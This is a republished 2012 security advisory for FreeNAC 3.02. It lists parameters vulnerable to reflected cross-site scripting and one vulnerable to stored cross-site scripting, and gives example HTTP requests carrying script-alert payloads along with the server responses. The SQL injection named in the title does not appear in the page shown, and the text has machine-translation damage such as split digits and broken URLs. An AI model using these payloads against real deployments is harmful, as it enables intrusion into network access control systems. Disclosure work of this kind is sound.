FreeNAC v3. 0 2 SQL injection and XSS flaws and fixes-vulnerability warning-the black bar safety net

2012-05-24T00:00:00
ID MYHACK58:62201233962
Type myhack58
Reporter 佚名
Modified 2012-05-24T00:00:00

Description

FreeNAC version 3.02 SQL Injection and XSS Vulnerabilties

Author: Blake

Software address: http://sourceforge.net/project/showfiles.php?group_id=170004

Affected version: 3.02

Test system: Ubuntu 8.04 (freenac version 3.02 vmware appliance)

FreeNAC FreeNAC provides Virtual LAN assignment, LAN access control (for all kinds of network devices such as Servers, Workstations, Printers, IP-Phones ..), live network end-device discovery. Both 802.1 x and Cisco's VMPS port security modes are supported. VLAN, switch port management and documentation of Patch cabling is also included.

The reflection type css:

Multiple parameters are vulnerable to reflective cross-site scripting.

Affected Parameters:

comment

mac

graphtype

type

name

Example Request:

GET /stats. php? graphtype=bar&type=vlan13<script>alert(1)</script> HTTP/1.1

Host: 192.168.1.118

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/2 0 1 0 0 1 0 1 For Firefox/12.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

DNT: 1

Proxy-Connection: keep-alive

Referer: http://www.xxxx.com /stats. php? graphtype=bar&type=switch

Cookie: freenac=92bcf3d911d94e33106c2e79745e8e8e

Example Response:

HTTP/1.1 2 0 0 OK

Date: Sat, 1 9 May 2 0 1 2 1 7:4 2:4 1 GMT

Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch

X-Powered-By: PHP/5.2.4-2ubuntu5

Expires: Mon, 1 9 Nov 1 9 8 1 0 8:5 2:0 0 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 5 6 7 6

Content-Type: text/html

<! DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8 8 5 9-1" />

<title>FreeNAC :: Swisscom ::</title>

<link href="bw. css" rel="stylesheet" type="text/css" />

</head>

<a href='./ index.html' title='Main Menu'><img src='./ images/logo_small. png' border='0' /></a>

.......... snip......................

<img src="statgraph. php? stattype=vlan13<script>alert(1)</script>&order=DESC&graphtype=bar"><br>

<br> <p class='UpdateMsg'>Database error</p>

<p>Please go to <a HREF='javascript:javascript:history. go(-1)'>back to the previous screen</a>, or the

<a href='./ index.php' >Main Menu</a> and start again, or try again later. </p>

Stored cross site:

The comment parameter is vulnerable to stored cross-site scripting.

Example

<changed from a POST to a GET>

http://www.2xxxx.com /deviceadd. php? name=test&mac=0001.0001.0001&status=1&vlan=6&username=2&office=1&comment="><script>alert(2)</script>&amp; action=Update&action_idx=1

Example Response:

HTTP/1.1 2 0 0 OK

Date: Sat, 1 9 May 2 0 1 2 1 7:5 3:3 8 GMT

Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch

X-Powered-By: PHP/5.2.4-2ubuntu5

Expires: Mon, 1 9 Nov 1 9 8 1 0 8:5 2:0 0 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 6 9 4 5

Content-Type: text/html

<! DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8 8 5 9-1" />

<title>FreeNAC :: Swisscom ::</title>

<link href="bw. css" rel="stylesheet" type="text/css" />

</head>

<a href='./ index.html' title='Main Menu'><img src='./ images/logo_small. png' border='0' /></a>

[1] [2] next